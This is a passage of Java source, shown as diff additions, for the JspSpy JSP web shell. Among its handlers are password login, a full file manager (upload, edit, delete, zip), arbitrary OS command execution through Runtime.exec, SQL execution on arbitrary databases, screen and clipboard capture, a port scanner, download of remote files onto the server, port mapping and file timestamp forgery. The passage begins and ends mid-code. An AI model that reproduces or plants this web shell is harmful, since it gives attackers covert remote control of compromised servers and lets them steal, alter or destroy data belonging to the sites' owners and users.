throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { 
+PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
    +try{
    +out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
    +}catch (Exception ex) {
    +out.println("ClipBoard is Empty Or Is Not Text Data !");
    +}
    +out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { 
+output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("

    "); +out.println("
    ");
    +String command = request.getParameter("command");
    +if (!Util.isEmpty(command)) {
    +Process pro = Runtime.getRuntime().exec(command);
    +BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    +String s = reader.readLine();
    +while (s != null) {
    +out.println(Util.htmlEncode(Util.getStr(s)));
    +s = reader.readLine();
    +}
    +reader.close();
    +out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); 
+} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void 
invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if 
(pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream 
output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if 